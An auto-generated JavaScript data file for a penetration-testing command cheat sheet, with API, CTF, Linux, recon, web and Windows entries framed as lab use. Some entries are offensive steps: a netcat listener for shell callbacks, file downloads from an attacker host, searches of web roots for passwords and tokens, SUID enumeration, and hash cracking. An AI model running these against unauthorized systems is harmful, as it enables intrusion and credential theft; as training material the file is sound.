// Auto-generated by tools/build.py. Do not edit manually.
window.MATRIX_COMMANDS = [
  {
    "id": "api-cors-cors-origin-check",
    "section": "Api",
    "category": "CORS",
    "title": "CORS origin check",
    "command": "curl -H 'Origin: https://evil.example' -I https://{{DOMAIN}}/api/profile",
    "description": "Check CORS response behavior safely.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "api"
  },
  {
    "id": "api-discovery-common-api-paths",
    "section": "Api",
    "category": "Discovery",
    "title": "Common API paths",
    "command": "ffuf -u https://{{DOMAIN}}/FUZZ -w wordlists/api-paths.txt -mc all",
    "description": "Discover common API paths in a permitted lab.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "api"
  },
  {
    "id": "api-discovery-fetch-openapi-spec",
    "section": "Api",
    "category": "Discovery",
    "title": "Fetch OpenAPI spec",
    "command": "curl -s https://{{DOMAIN}}/openapi.json | jq .",
    "description": "Retrieve and format an API spec where exposed intentionally.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "api"
  },
  {
    "id": "api-graphql-graphql-introspection-query",
    "section": "Api",
    "category": "GraphQL",
    "title": "GraphQL introspection query",
    "command": "curl -X POST https://{{DOMAIN}}/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name}}}\"}'",
    "description": "Check GraphQL introspection in authorized labs.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "api"
  },
  {
    "id": "api-http-get-with-bearer-token",
    "section": "Api",
    "category": "HTTP",
    "title": "GET with bearer token",
    "command": "curl -H 'Authorization: Bearer {{TOKEN}}' https://{{DOMAIN}}/api/me -i",
    "description": "Send an authenticated API request.",
    "placeholders": [
      "DOMAIN",
      "TOKEN"
    ],
    "pack": "api"
  },
  {
    "id": "api-http-post-json-login",
    "section": "Api",
    "category": "HTTP",
    "title": "POST JSON login",
    "command": "curl -X POST https://{{DOMAIN}}/api/login -H 'Content-Type: application/json' -d '{\"username\":\"{{USERNAME}}\",\"password\":\"{{PASSWORD}}\"}' -i",
    "description": "Send JSON login request in a lab.",
    "placeholders": [
      "DOMAIN",
      "PASSWORD",
      "USERNAME"
    ],
    "pack": "api"
  },
  {
    "id": "api-idor-lab-change-object-id-manually",
    "section": "Api",
    "category": "IDOR Lab",
    "title": "Change object id manually",
    "command": "curl -H 'Authorization: Bearer {{TOKEN}}' https://{{DOMAIN}}/api/users/{{USER_ID}} -i",
    "description": "Authorized lab test for object-level authorization.",
    "placeholders": [
      "DOMAIN",
      "TOKEN",
      "USER_ID"
    ],
    "pack": "api"
  },
  {
    "id": "api-jwt-decode-jwt-locally",
    "section": "Api",
    "category": "JWT",
    "title": "Decode JWT locally",
    "command": "python3 - <<'PY'\nimport jwt\nprint(jwt.decode('{{TOKEN}}', options={\"verify_signature\": False}))\nPY",
    "description": "Decode token claims locally without verification.",
    "placeholders": [
      "TOKEN"
    ],
    "pack": "api"
  },
  {
    "id": "api-methods-options-method",
    "section": "Api",
    "category": "Methods",
    "title": "OPTIONS method",
    "command": "curl -X OPTIONS https://{{DOMAIN}}/api/users -i",
    "description": "Check allowed HTTP methods.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "api"
  },
  {
    "id": "api-rate-limit-simple-rate-limit-loop",
    "section": "Api",
    "category": "Rate Limit",
    "title": "Simple rate-limit loop",
    "command": "for i in $(seq 1 20); do curl -s -o /dev/null -w '%{http_code}\\n' https://{{DOMAIN}}/api/login; done",
    "description": "Check whether a lab endpoint returns limiting responses.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "api"
  },
  {
    "id": "ctf-crypto-rot13",
    "section": "Ctf",
    "category": "Crypto",
    "title": "ROT13",
    "command": "echo 'grkg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'",
    "description": "Decode ROT13 text.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-encoding-base64-decode",
    "section": "Ctf",
    "category": "Encoding",
    "title": "Base64 decode",
    "command": "echo 'dGV4dA==' | base64 -d",
    "description": "Decode base64 text.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-encoding-base64-encode",
    "section": "Ctf",
    "category": "Encoding",
    "title": "Base64 encode",
    "command": "echo -n 'text' | base64",
    "description": "Encode text.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-files-check-file-type",
    "section": "Ctf",
    "category": "Files",
    "title": "Check file type",
    "command": "file file && exiftool file",
    "description": "Inspect file metadata.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-files-find-hidden-strings",
    "section": "Ctf",
    "category": "Files",
    "title": "Find hidden strings",
    "command": "strings file | less",
    "description": "Extract printable strings.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-hashing-hashcat-example",
    "section": "Ctf",
    "category": "Hashing",
    "title": "Hashcat example",
    "command": "hashcat -m 0 hash.txt wordlists/rockyou.txt",
    "description": "Example MD5 hashcat run for CTF use.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-hashing-identify-hash",
    "section": "Ctf",
    "category": "Hashing",
    "title": "Identify hash",
    "command": "hashid 'HASH_HERE'",
    "description": "Identify hash type in a CTF.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-hashing-john-wordlist-crack",
    "section": "Ctf",
    "category": "Hashing",
    "title": "John wordlist crack",
    "command": "john --wordlist=wordlists/rockyou.txt hash.txt",
    "description": "Crack lab hash with a permitted wordlist.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-shell-upgrade-python-pty-upgrade",
    "section": "Ctf",
    "category": "Shell Upgrade",
    "title": "Python PTY upgrade",
    "command": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "description": "Upgrade a basic lab shell.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-shell-upgrade-tty-stabilize",
    "section": "Ctf",
    "category": "Shell Upgrade",
    "title": "TTY stabilize",
    "command": "stty raw -echo; fg",
    "description": "Stabilize interactive shell after backgrounding.",
    "placeholders": [],
    "pack": "ctf"
  },
  {
    "id": "ctf-shells-netcat-listener",
    "section": "Ctf",
    "category": "Shells",
    "title": "Netcat listener",
    "command": "nc -lvnp {{PORT}}",
    "description": "Start a listener for authorized lab callbacks.",
    "placeholders": [
      "PORT"
    ],
    "pack": "ctf"
  },
  {
    "id": "ctf-shells-python-http-server",
    "section": "Ctf",
    "category": "Shells",
    "title": "Python HTTP server",
    "command": "python3 -m http.server {{PORT}}",
    "description": "Serve files from current directory in a lab.",
    "placeholders": [
      "PORT"
    ],
    "pack": "ctf"
  },
  {
    "id": "linux-archives-extract-tar-gz",
    "section": "Linux",
    "category": "Archives",
    "title": "Extract tar.gz",
    "command": "tar -xzf file.tar.gz",
    "description": "Extract a tar.gz archive.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-basics-current-user",
    "section": "Linux",
    "category": "Basics",
    "title": "Current user",
    "command": "id && whoami",
    "description": "Show current user and groups.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-basics-system-info",
    "section": "Linux",
    "category": "Basics",
    "title": "System info",
    "command": "uname -a && cat /etc/os-release",
    "description": "Show kernel and distro details.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-files-find-suid-files",
    "section": "Linux",
    "category": "Files",
    "title": "Find SUID files",
    "command": "find / -perm -4000 -type f 2>/dev/null",
    "description": "Find SUID binaries for authorized privilege escalation practice.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-files-find-writable-directories",
    "section": "Linux",
    "category": "Files",
    "title": "Find writable directories",
    "command": "find / -writable -type d 2>/dev/null | head -50",
    "description": "List writable directories in a lab machine.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-network-routes-and-interfaces",
    "section": "Linux",
    "category": "Network",
    "title": "Routes and interfaces",
    "command": "ip addr && ip route",
    "description": "Show interfaces and routes.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-processes-process-list",
    "section": "Linux",
    "category": "Processes",
    "title": "Process list",
    "command": "ps aux --forest",
    "description": "Review running processes.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-search-search-for-credentials-keywords",
    "section": "Linux",
    "category": "Search",
    "title": "Search for credentials keywords",
    "command": "grep -RniE 'password|passwd|secret|token' /var/www 2>/dev/null | head -50",
    "description": "Look for common lab credential leaks.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-services-listening-ports",
    "section": "Linux",
    "category": "Services",
    "title": "Listening ports",
    "command": "ss -tulpen",
    "description": "Show listening TCP/UDP services.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-transfer-download-with-wget",
    "section": "Linux",
    "category": "Transfer",
    "title": "Download with wget",
    "command": "wget http://{{LHOST}}:{{PORT}}/file -O file",
    "description": "Download from your own lab host.",
    "placeholders": [
      "LHOST",
      "PORT"
    ],
    "pack": "linux"
  },
  {
    "id": "linux-users-readable-passwd",
    "section": "Linux",
    "category": "Users",
    "title": "Readable passwd",
    "command": "cat /etc/passwd",
    "description": "List local user records.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "linux-users-sudo-privileges",
    "section": "Linux",
    "category": "Users",
    "title": "Sudo privileges",
    "command": "sudo -l",
    "description": "Check allowed sudo commands for current user.",
    "placeholders": [],
    "pack": "linux"
  },
  {
    "id": "recon-dns-dns-lookup",
    "section": "Recon",
    "category": "DNS",
    "title": "DNS lookup",
    "command": "dig {{DOMAIN}}",
    "description": "Basic DNS lookup.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-dns-find-name-servers",
    "section": "Recon",
    "category": "DNS",
    "title": "Find name servers",
    "command": "dig NS {{DOMAIN}} +short",
    "description": "List domain name servers.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-dns-zone-transfer-test",
    "section": "Recon",
    "category": "DNS",
    "title": "Zone transfer test",
    "command": "dig axfr @{{IP}} {{DOMAIN}}",
    "description": "Test zone transfer only on authorized DNS labs.",
    "placeholders": [
      "DOMAIN",
      "IP"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-host-discovery-fast-ping-sweep",
    "section": "Recon",
    "category": "Host Discovery",
    "title": "Fast ping sweep",
    "command": "nmap -sn {{IP}}/24",
    "description": "Discover live hosts in an authorized subnet.",
    "placeholders": [
      "IP"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-host-discovery-ping-target",
    "section": "Recon",
    "category": "Host Discovery",
    "title": "Ping target",
    "command": "ping -c 4 {{IP}}",
    "description": "Check whether the target host responds to ICMP in a lab.",
    "placeholders": [
      "IP"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-port-scanning-full-tcp-scan",
    "section": "Recon",
    "category": "Port Scanning",
    "title": "Full TCP scan",
    "command": "nmap -p- --min-rate 5000 -T4 {{IP}}",
    "description": "Scan all TCP ports in a lab environment.",
    "placeholders": [
      "IP"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-port-scanning-quick-top-ports-scan",
    "section": "Recon",
    "category": "Port Scanning",
    "title": "Quick top ports scan",
    "command": "nmap -T4 --top-ports 100 {{IP}}",
    "description": "Quickly scan common ports.",
    "placeholders": [
      "IP"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-port-scanning-service-version-scan",
    "section": "Recon",
    "category": "Port Scanning",
    "title": "Service/version scan",
    "command": "nmap -sV -sC -p {{PORT}} {{IP}}",
    "description": "Run default scripts and version detection on selected ports.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-udp-scanning-top-udp-scan",
    "section": "Recon",
    "category": "UDP Scanning",
    "title": "Top UDP scan",
    "command": "sudo nmap -sU --top-ports 20 {{IP}}",
    "description": "Check common UDP services.",
    "placeholders": [
      "IP"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-web-discovery-directory-discovery",
    "section": "Recon",
    "category": "Web Discovery",
    "title": "Directory discovery",
    "command": "ffuf -u http://{{IP}}:{{PORT}}/FUZZ -w wordlists/common.txt",
    "description": "Find common paths using a local wordlist.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-web-discovery-http-headers",
    "section": "Recon",
    "category": "Web Discovery",
    "title": "HTTP headers",
    "command": "curl -I http://{{IP}}:{{PORT}}",
    "description": "Fetch response headers.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "recon"
  },
  {
    "id": "recon-web-discovery-web-title-with-httpx",
    "section": "Recon",
    "category": "Web Discovery",
    "title": "Web title with httpx",
    "command": "httpx -u http://{{IP}}:{{PORT}} -title -status-code -tech-detect",
    "description": "Fingerprint a lab web service.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "recon"
  },
  {
    "id": "web-content-discovery-gobuster-directory-scan",
    "section": "Web",
    "category": "Content Discovery",
    "title": "Gobuster directory scan",
    "command": "gobuster dir -u http://{{IP}}:{{PORT}} -w wordlists/common.txt -x php,txt,html",
    "description": "Discover content on a lab web server.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "web"
  },
  {
    "id": "web-content-discovery-recursive-ffuf",
    "section": "Web",
    "category": "Content Discovery",
    "title": "Recursive ffuf",
    "command": "ffuf -u http://{{DOMAIN}}/FUZZ -w wordlists/common.txt -recursion -recursion-depth 2",
    "description": "Recursive content discovery on permitted target.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "web"
  },
  {
    "id": "web-http-post-form-test",
    "section": "Web",
    "category": "HTTP",
    "title": "POST form test",
    "command": "curl -X POST http://{{IP}}:{{PORT}}/login -d 'username={{USERNAME}}&password={{PASSWORD}}' -i",
    "description": "Send a lab login form request.",
    "placeholders": [
      "IP",
      "PASSWORD",
      "PORT",
      "USERNAME"
    ],
    "pack": "web"
  },
  {
    "id": "web-http-save-response-body",
    "section": "Web",
    "category": "HTTP",
    "title": "Save response body",
    "command": "curl -s http://{{IP}}:{{PORT}}/ -o response.html",
    "description": "Save response for offline review.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "web"
  },
  {
    "id": "web-nikto-nikto-basic-scan",
    "section": "Web",
    "category": "Nikto",
    "title": "Nikto basic scan",
    "command": "nikto -h http://{{IP}}:{{PORT}}",
    "description": "Run a basic web server check in labs.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "web"
  },
  {
    "id": "web-parameters-parameter-fuzzing-get",
    "section": "Web",
    "category": "Parameters",
    "title": "Parameter fuzzing GET",
    "command": "ffuf -u 'http://{{IP}}:{{PORT}}/index.php?FUZZ=test' -w wordlists/params.txt",
    "description": "Discover reflected or accepted GET parameters.",
    "placeholders": [
      "IP",
      "PORT"
    ],
    "pack": "web"
  },
  {
    "id": "web-security-headers-check-security-headers",
    "section": "Web",
    "category": "Security Headers",
    "title": "Check security headers",
    "command": "curl -I https://{{DOMAIN}} | grep -Ei 'strict|content-security|x-frame|x-content|referrer'",
    "description": "Review common defensive headers.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "web"
  },
  {
    "id": "web-tls-tls-quick-check",
    "section": "Web",
    "category": "TLS",
    "title": "TLS quick check",
    "command": "testssl.sh https://{{DOMAIN}}",
    "description": "Check TLS configuration when authorized.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "web"
  },
  {
    "id": "web-virtual-hosts-vhost-fuzzing",
    "section": "Web",
    "category": "Virtual Hosts",
    "title": "Vhost fuzzing",
    "command": "ffuf -u http://{{IP}}/ -H 'Host: FUZZ.{{DOMAIN}}' -w wordlists/subdomains.txt -fs 0",
    "description": "Find virtual hosts in a CTF/lab.",
    "placeholders": [
      "DOMAIN",
      "IP"
    ],
    "pack": "web"
  },
  {
    "id": "web-wordpress-wpscan-enumerate-users",
    "section": "Web",
    "category": "WordPress",
    "title": "WPScan enumerate users",
    "command": "wpscan --url http://{{DOMAIN}} --enumerate u",
    "description": "Enumerate WordPress users in an authorized lab.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "web"
  },
  {
    "id": "web-wordpress-wpscan-plugins",
    "section": "Web",
    "category": "WordPress",
    "title": "WPScan plugins",
    "command": "wpscan --url http://{{DOMAIN}} --enumerate p",
    "description": "Enumerate plugins in an authorized lab.",
    "placeholders": [
      "DOMAIN"
    ],
    "pack": "web"
  },
  {
    "id": "windows-basics-current-user",
    "section": "Windows",
    "category": "Basics",
    "title": "Current user",
    "command": "whoami /all",
    "description": "Show user, groups, and privileges.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-basics-system-info",
    "section": "Windows",
    "category": "Basics",
    "title": "System info",
    "command": "systeminfo",
    "description": "Show host and OS details.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-network-listening-ports",
    "section": "Windows",
    "category": "Network",
    "title": "Listening ports",
    "command": "netstat -ano",
    "description": "Show listening ports and PIDs.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-network-network-config",
    "section": "Windows",
    "category": "Network",
    "title": "Network config",
    "command": "ipconfig /all && route print",
    "description": "Show network configuration and routes.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-powershell-download-file",
    "section": "Windows",
    "category": "PowerShell",
    "title": "Download file",
    "command": "powershell -c \"Invoke-WebRequest -Uri http://{{LHOST}}:{{PORT}}/file -OutFile file\"",
    "description": "Download from your own lab host.",
    "placeholders": [
      "LHOST",
      "PORT"
    ],
    "pack": "windows"
  },
  {
    "id": "windows-powershell-find-files-by-name",
    "section": "Windows",
    "category": "PowerShell",
    "title": "Find files by name",
    "command": "powershell -c \"Get-ChildItem C:\\ -Recurse -ErrorAction SilentlyContinue -Filter *config*\"",
    "description": "Find config files.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-powershell-search-text-files",
    "section": "Windows",
    "category": "PowerShell",
    "title": "Search text files",
    "command": "powershell -c \"Select-String -Path C:\\inetpub\\wwwroot\\* -Pattern 'password','secret','token' -Recurse\"",
    "description": "Search web root for lab credential keywords.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-services-services-list",
    "section": "Windows",
    "category": "Services",
    "title": "Services list",
    "command": "wmic service get name,displayname,pathname,startmode",
    "description": "Review services and paths.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-users-local-admins",
    "section": "Windows",
    "category": "Users",
    "title": "Local admins",
    "command": "net localgroup administrators",
    "description": "List local administrators.",
    "placeholders": [],
    "pack": "windows"
  },
  {
    "id": "windows-users-local-users",
    "section": "Windows",
    "category": "Users",
    "title": "Local users",
    "command": "net user",
    "description": "List local users.",
    "placeholders": [],
    "pack": "windows"
  }
];
